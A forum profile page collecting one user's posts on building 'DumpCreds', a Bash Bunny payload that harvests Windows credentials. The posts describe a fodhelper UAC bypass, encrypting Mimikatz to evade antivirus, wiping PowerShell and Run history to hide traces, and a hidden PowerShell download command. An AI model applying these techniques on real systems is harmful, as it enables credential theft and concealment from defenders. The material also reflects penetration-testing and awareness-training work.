Jump to content

qdba

Active Members
  • Posts

    87
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by qdba

  1. Maybe an VirusScanner lazagne.exe was mostly catched by AV.
  2. Add multiple UAC Modes set variable UAC_MODE in payload.txt UAC_MODE=1 # Fodhelper UAC UAC_MODE=0 # Standard UAC Mode Just Beta ( Works on my Windows 10 - Not tested on 7 yet)
  3. OK.... Some new changes (Beta State) Better Cleanup - remove all changes in Powershell History - remove all changes in Run MRU (not only delete te files) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  4. I must check, if the command for switching of the history is still in the history file after execution. Can't do it now. Have no powershell here. The result give me the route foe the rest.
  5. It cannot be done in the line with the main.ps1 call because...... ....... A 1 first Powershell task will be started fo the input of the registry command for UAC Baypass. Than the fodhelper opens a second Powershell task in Admin mode. The first Powershell task can be closed after the fodhelper thing The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS Task. A third PS Task ist opening, waiting for HTTP Server is coming up and downloads the main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line. If you remove the history between the main.ps1 call and the exit command it's to fast. the main.ps1 is still running and create new history events. The main.ps1 is ready if the EOF File was created in the loot dir. ( payload.txt: line 95 ) The computer can be cleand after this event. so... 1. The history must switched of at the very first beginning befor the Regiytry Command of UAC Bypass. Considerations: does the Set-PSReadlineOption –HistorySaveStyle SaveNothing comman switch of the history global ? If so ... good... if not set a Marker in History file 2. Do all the stuff..... 3. Problem.... Switch history on after the EOF will be written. Maybe can be done with switch ATTACKMODE to HID and do all the things in a GUI (r ?) or start a dos comandline at the end of main.ps1 wo do all the cleanup (Switch on commandline kill powershell, copy back a saved history file, delete all lines from marker to end or.... / and... other things. Will sleep after that..
  6. Got it ... With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off. So I set it at the beginning of the Script and delete the History File at the end
  7. Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the powershell history.
  8. Code for clearing "Run" history was already in main.ps1 ......... # Epmty Run Input Field Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentContinue ........ Added the code to clear Powwershell history to main.ps1 We should avoid too much "Q GUI r" commands. because it's visible.
  9. Which Version of DumpCreds do you use? The newest ist 2.3. You can download it here https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  10. Updated the repo so hak5 could merge it to the master branch Changed Version to 2.3 Add taskill /F /IM powershell.exe at the end of main.ps1
  11. I merged your path to the master branch. Did some patches so fodhelper starts hidden. https://github.com/qdba/bashbunny-payloads/blob/master/payloads/library/credentials/DumpCreds/payload.txt
  12. @PoSHMagiC0de Thank you for your opinion and suggestion. I give you 100% , writing scripts in Function format is not so bad. But... ... When I start writing DumpCreds and other scripts for BB I didn't do anything before with powershell. Not even a "Hello World" . So I'm fighting a lot with the powershell syntax and some effects I did not expect. - output Lines are truncated - piping directly to a file on BB's smbserver.py did not work - when I piping the output to variables CRs and LFs are vanished - No idea how to start functions in Background I'm CIO and CSIO at 3 different companies with round about 350 Workstation 30 Servers 120 Printers. My team ( 2 other guys) and I do everything you can imagine in the IT. From installing and configurating firewalls, switches and routers, SAN, NAS, over 1st, 2nd, 3rd Level Support for the employees in Office and Windows, communication , managing and configure the 30 postfix, exchange, Samba, HTTP, Secmail File ,..... Servers, supporting and customizing SAP (MM, PP, Base, WM, user rights management, ) ,writing Reports and Scripts in ABAP, Perl, Bash, DOS, VB, VBA, QlickView, and so on..... 3 persons for the whole IT stuff with less help from outside. I need DumpCreds and a Excel Doc with encrypted meterpreter shellcode for a live hacking demo during the training to raise the awareness of our employees in IT Security. I will sensitize them. As I did it, it was the fastest and most effective way for me to learn powershell and program that script. At the moment I have no time to take care about a well written script. Maybe I will do it in version 3.0 . (And I will remove my modifications from the used Empire scripts in 3.0). I did the encryption thing because everytime a plugged in BB in arming or storage mode for developing or trying another payload my AV deletes Empires Mimikatz.ps1 script. A simple obfuscation didn't help a lot. First I wanted to do it with base64 encoding and compression. But during my work with the excel doc the base64 encoded meterpreter shellcode was detected by my AV Scanners. I think one day AV Scanneres will detect the encoded mimikatz Script. Especially I pulish the script in the forum. If so its very easy to hide the script once more. Only changing the password and/or salt. Encode it new with https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles and thats it. Thats the idea behind all...
  13. 1. Do you set the IP of the Remote NDIS Driver on your Computer manually or have you enabled ICS sharing? The command GET TARGET_IP does onliy work if your Remote NDIS Driver is set to DHCP 2. If you have Admin rights at your computer (the UAC is working) the script is set to AdminMode=True. If your have no Admin rights it doesn't make sense to run mimikatz or hashdump because tis works only if you have Admin rights. So AdminMode shows only if you have admin rights ($true) or not (false).
  14. @PoSHMagiC0de Thanks for your comment. This comes from not searching enough. But now there are 2 scripts for encrypting code. This helps to hide some code from detecting by AV. I just started with powershell scripting so it was good for learning.
  15. EncDecFiles.ps1 Author: (c) 2017 by QDBA Version 1.0 Description EncDecFiles.ps1 is a powershell script to Encrypt / Decrypt a powershell (or any other) file with AES. You can use it to obfuscate your powershell script, so AV Scanner doesn't detect it. Usage: EncDecFiles.ps1 < -Encrypt | -Decrypt > # encrypt or decrypt a file < -In Filename > # Input File [ -Out Filename ] # Output File [ -Pass Password ] # Password Example 1 - encdecfiles.ps1 -In c:\test.ps1 -encrypt Encrypts File c:\test.ps1 with password "hak5bunny" encrypted file is c:\test.enc Example 2 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -pass secret Encrypts File c:\test.ps1 with password "secret" encrypted file is c:\test.enc Example 3 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -Out c:\encrypted-file.aes -pass Secret Encrypt a File c:\Test.ps1 with password "Secret" encrypted file is c:\encrypted-file.aes Example 4 - encdecfiles.ps1 -In c:\Test.enc -decrypt Decrypt a encrypted file c:\test1.enc to c:\test1.ps1 with default password "hak5bunny" How to run the encrypted powershell script In the Script "Run_Script_Example.ps1" you see an example how to load and execute the encrypted Script. Load the encrypted script to a variable. Than execute the function Run with the variable and a password Download https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles
  16. The payload is doing that. Just change Q ALT j to Q ALT y in payload.txt. It's because I'm on German language
  17. smbserver stuff removed handshake removed HTTP Server added (Download Powershell scripts, upload loot) Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-m1m1d0gz.enc. Not really neccessary but if you are in storage mode, the AV doesn't remove it. All in all a little bit faster removed the debug code recoded the Get-WiFiCreds.ps1 for working on Windows 7
  18. DumpCreds 2.3.3 Author: QDBA Version: Version 2.3.1 Build 1013 Target: Windows 7, 10 Description ** !!!!! works only at Bash Bunny with FW 1.1+ !!!!! ** Dumps the usernames & plaintext passwords from Browsers (Chrome, FireFox) Wifi Creds SAM Hashes (only if AdminMode=True) Mimimk@tz Dump (only if AdminMode=True) Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Problems if you use the payload on a computer th efirst time, it will take some time and tries until the drivers are successfully loaded. If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times) If the payload stops working yellow LED blinks very fast or triples longer than 2min. You get no white LED. Your run into a time out. If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue) Don't use a static IP on Target Computer. ( GET TARGET_IP works only if DHCP is used. ) Configuration None. Requirements If you have an other language than us install it according to the Bash Bunny documentation Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds Install Put Bash Bunny in arming mode Change DUCKY_LANG in config.txt of payload.txt if needed, Edit Get-WifiCreds.ps1 and change ".... | Select-String -Pattern entries to your language if other than "de" or "us" Copy all files and folders in Githubs DumpCred Folder to your favorit switch folder eject Bash Bunny safely!! move switch into right position if necessary set UAC Mode in payload.txt ( 1 ) Fodhelper UAC (Win 10 only), 0 = Standard UAC (Win 7 + Win 10)) plugin Bash Bunny and have fun....! :-) STATUS LED Status Magenta Solid Setup Red fast blink Target did not acquire IP address Yellow single blink Initialization Yellow double blink HID Stage Yellow Veryfast Wait for IP coming up, Run Powershell scripts White Cleanup, copy Files to /loot Green Finished Discussion https://forums.hak5.org/index.php?/topic/40806-payload-new-dumpcreds-22/ Credits special thx to illwill & tux for the server.py (HTTP_Server) https://github.com/EmpireProject/Empire (Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1,dumpCredStore.ps1) Valentin-Metz for inserting the Fodhelper UAC-Bypass ( Resource: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1 ) Changelog Version 2.3.3 [Build 1013] Minor changes Encode Invoke-PowerDump because of caught by AV Add dumpCredStore; Dumps credential from Vault Version 2.3.2 [Build 1012] Multiple UAC Modes 1 = Fodhelper; 0 = Standard UAC [Build 1011] Undo all changes in RunMRU and Powershell history Version 2.3.1 [Build 1009] Merged the UAC Bypass fodhelper changes from valentin-metz Version 2.2 [Build 1008] Removed DUCKY_LANG from payload.txt because set it in config.txt [FW 1.2]. [Build 1007] Some Errors fixed with Char Encoding and Encrypted PS Payloads in Windows 7 [Build 1006] smbserver stuff removed handshake removed HTTP Server added (Download Powershell scripts, upload loot) Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-M1m1d0gz.enc. Not really neccessary but if you are in storage mode, the AV doesn't remove it. :-) All in all a little bit faster remove the debug code recoded the Get-WiFiCreds.ps1 for working on Windows 7 Version 2.1 [Build 1007] Some Errors fixed with Char Encoding and Encrypted PS Payloads in Windows 7 [Build 1006] smbserver stuff removed handshake removed HTTP Server added (Download Powershell scripts, upload loot) Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-M1m1d0gz.enc. Not really neccessary but if you are in storage mode, the AV doesn't remove it. :-) All in all a little bit faster remove the debug code recoded the Get-WiFiCreds.ps1 for working on Windows 7 Version 2.1 Complete new payload.txt code for BashBunny 1.1 Added a lot of debug cod into the payload Universal payload. Never mind if you are admin (With UAC Prompt) or not (with Credentials Prompt) the payload works anyway.
  19. 2.2 is heavy under development and not ready for use. - Payload not ready - main.ps1 50% ready all powershell files were aes encoded they will encoded direct to memory so av scanner does not detect them too fast. - Encode Decode Script ready Please wait a few days until all is working fine.
×
×
  • Create New...